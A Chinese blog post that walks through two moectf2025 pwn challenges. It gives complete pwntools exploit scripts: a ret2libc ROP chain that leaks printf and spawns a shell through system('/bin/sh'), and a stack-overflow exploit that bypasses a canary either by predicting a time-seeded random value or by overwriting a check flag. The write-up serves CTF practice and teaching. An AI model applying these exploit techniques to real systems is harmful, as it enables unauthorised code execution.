Mkrari

GitHub

统计加载中...

公告

欢迎访问我的博客！这里会分享技术文章和生活感悟。

Mkrari

GitHub

统计加载中...

公告

欢迎访问我的博客！这里会分享技术文章和生活感悟。

标签

ACM CTF 教程新生赛杂谈

1366 字

3 分钟

moectf2025_pwn_part.2(详细审计_6~8)

2026-04-09

日常练习

CTF

统计加载中...

备赛蓝桥也不会忘了更新（），毕竟拖太久可能就懒得写了。

prelibc#

我们看到这里的 $NX$ (栈不可执行保护)开启了，并且也没有给我们开辟一段有权限的内存空间，所以我们并不能向上一题一样用 $shellcode$ 。
不过这题的原代码还是比较简单的， $printf()$ 这里泄露了 $printf$ 的地址给我们，我们需要接收。
我们再看看 $vuln()$ 函数里面。给了一个明确的栈溢出，长度也是相对足够的。
现在来讲讲原理。这题就是比较经典的 $libc$ 。 $libc$ 一般指 $glibc$ ，它里面封装了许多 $C$ 语言的系统调用，并存在有许多我们可以利用的函数。我们可以利用 $libc$ 来泄露和利用我们想要使用的那个函数。
我们首先要用 $recvline()$ 来接收发送的字节流， $strip()$ 来截断字符串首尾的空白字符。然后存储转换成十进制来存储，方便后续操作。
然后我们可以利用泄露的实际地址减去对应其在 $libc$ 库中的偏移量来计算出 $libc$ 的基址，并存入 $libc.address$ 中。注：这里我们用了 $pwntools$ 的 $ELF$ 来解析我们对应的二进制文件和 $libc$ 里面存有的 $ELF$ 头，程序头，节表头，并读取符号表。而 $libc.symbols$ 是一个类似于字典的特殊的映射，键值是 $['printf']$ ，值是符号在虚拟地址(相对于库加载基址的偏移)。值得注意的是，这里的所有值都是直接从 $ELF$ 中读取的，不是内存中的实际地址。
在上述存入 $libc.address$ 的操作后， $libc.symbols[]$ 就不再只是简单的偏移了，而是存有了实际的地址。所以这里的 $libc.symbols['system']$ 是 $system$ 真实的地址。然后我们需要搜索对应的 $/bin/sh$ 子串。这里使用的了 $libc.search(pattern)$ 来搜索 $/bin/sh$ 这个子串，它会在 $ELF$ 的原始二进制文件中搜索指定的字节模式 $(pattern)$ ，然后返回一个生成器，每次输出一个对应的偏移量。然后我们用 $next()$ 来取出这个迭代器存有的第一个元素(对应的偏移量)。在 $/bin/sh$ 后加上空字节 $'\\x00'$ 是为了防止读取到其他错误的字节串。
接着我们还需要一个 $rdi$ 寄存器的地址来存入第一个元素，以及一个 $ret$ 的地址来进行栈对齐。这里我们发现没有对应可以利用 $rdi$ 。

不过我们可以利用一下

libc.so.6

，然后可以发现里面有我们需要的

gadget

。

然后我们知道溢出所需的大小就可以构造

rop

链了。这里用的是构造

system('/bin/sh')

来

getshell

。

1
from pwn import *
2

3
context(arch = 'amd64',os = 'linux',log_level = 'debug')
4
context.terminal = ['tmux','splitw','-h']
5

6
elf = ELF('./pwn_patched')
7
libc = ELF('./libc.so.6')
8
io = process('./pwn_patched')
9
#io = remote('127.0.0.1',37453)
10

11
#gdb.attach(io)
12
io.recvuntil(b"the location of 'printf': ")
13
leaked_printf_str = io.recvline().strip()
14
leaked_printf_addr = int(leaked_printf_str, 16)
15
log.success(f"printf address: {hex(leaked_printf_addr)}")
16

17
libc.address = leaked_printf_addr - libc.symbols['printf']
18
log.success(f"libc base address: {hex(libc.address)}")
19

20
system_addr = libc.symbols['system']
21
bin_sh_addr = next(libc.search(b'/bin/sh\x00'))
22
log.success(f"system address: {hex(system_addr)}")
23
log.success(f"'/bin/sh' string address: {hex(bin_sh_addr)}")
24

25
pop_rdi_addr = libc.address + 0x02a3e5
26
ret_addr = libc.address + 0x029139
27

28
offset = 64 + 8
29

30
payload = flat([
31
    b'A' * offset,
32
    p64(ret_addr),
33
    p64(pop_rdi_addr),
34
    p64(bin_sh_addr),
35
    p64(system_addr)
36
])
37
io.sendlineafter(b'> ', payload)
38
log.info("Payload sent!")
39

40
io.interactive()

boom#

比较长的代码，一步步来看。

fgets

让我们向

\&brute\_choice

上输入

8

字节。我们看到后面当

\&brute\_choice

等于

121

和

89

时（

ascii

码对应

'Y'

和

'y'

）才能触发爆破模式。然后

v6

会设置为

1

，在

if(v6)

的判断中使用

gets()

，（无限制地写入）。所以我们的第一步需要发送一个

'Y'

或者

'y'

触发爆破模式。
接着我们看到

canary

是由

random()

生成的随机数再对

114514

取余，然后被放在了

v5

上。但我们注意到，

v5

的位置是在

[rsp-14h]

上。也就是在缓冲区上。我们在填充缓冲区溢出时势必会覆盖掉这个

cannary

的值，然后就会进入后续的判断

if(v6 \&\& v5 != canary)

中，触发

canary

的安全检查失败。所以我们需要伪造一个相同的

canary

值对齐原来的

canary

值。这里我们还要注意到一点。

init

里面调用了

srandom(time(0))

来设置种子。我们知道

random()

是一个伪随机数生成器，其输出完全由

seed

来确定。所以我们只需要在相同时间窗口内使用相同的的

init

和随机数生成函数(

randd

)就可以生成和

canary

相同的值。

所以我们的最终解决方案是自己编译一个

C

语言源文件。然后编译成可以利用的共享文件

(.so)

，然后用

ctypes

在

python

中调用然后生成相对应的

canary

。在先填充完

[rbp-90h]

到

[rbp -14h]

位置，然后写入

canary

(

canary

是

int

类型所以用

p32()

)，然后继续填充到栈溢出，返回后门函数即可。

NOTE

这里补充一些知识。
$ctypes$ 是于 $C$ 语言兼容的数据类型库，允许调用动态链接库 $(dll/so)$ 的函数。
$ctypes.CDLL()$ 是加载指定路径的动态库，使用 $linux$ 下的 $C$ 语言默认调用约定。加载完成后我们就可以直接调用使用库里的函数了。

$EXP$ (对齐 $canary$ ):

1
from pwn import *
2
import ctypes
3

4
context(arch = 'amd64', os ='linux', log_level = 'debug')
5

6
io = remote('127.0.0.1',35107)
7
#io = process('./pwn')
8
#gdb.attach(io)
9

10
io.sendlineafter("Do you want to brute-force this system? (y/n)",b'y')
11
ret_addr = 0x40101a
12

13
lib = ctypes.CDLL('./1.so')
14
lib.randd.restype = ctypes.c_int
15
lib.init()
16
canary = lib.randd()
17

18
win_addr = 0x40127B
19

20
payload = flat([
21
    b'a' * (0x90 - 0x14),
22
    p32(canary),
23
    b'a' * (0x10 + 8),
24
    #p64(ret_addr),
25
    p64(win_addr)
26
])
27
io.sendlineafter(b"Enter your message: ",payload)
28

29
io.interactive()

编译 $C$ 语言文件:

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <string.h>
4
#include <unistd.h>
5
#include <time.h>
6
void init(){
7
    srandom(time(0));
8
    return;
9
}
10
int randd(){
11
    return random()%114514;
12
}

在对应的文件目录下编译：

1
gcc -shared -fPIC myrand.c -o 1.so

此外其实还有一种非常巧妙地解法。
我们看到爆破完之后会进入 $if(v6)$ 的判断语句内，开始 $gets()$ 溢出。 $v6$ 在栈上，它的位置是 $[rbp-4h]$ ，我们可以将 $v6$ 直接覆盖为 $0$ ，这样在后续的 $if(v6 \&\& v5 != canary)$ 判断就可以直接绕过了。

1
from pwn import *
2
import ctypes
3

4
context(arch = 'amd64', os ='linux', log_level = 'debug')
5

6
io = remote('127.0.0.1',35107)
7
#io = process('./pwn')
8
#gdb.attach(io)
9

10
io.sendlineafter("Do you want to brute-force this system? (y/n)",b'y')
11
ret_addr = 0x40101a
12
win_addr = 0x40127B
13

14
payload = flat([
15
    b'a' * (0x90 - 0x4),
16
    p32(0),
17
    b'a' * 8,
18
    #p64(ret_addr),
19
    p64(win_addr)
20
])
21
io.sendlineafter(b"Enter your message: ",payload)
22

23

24
io.interactive()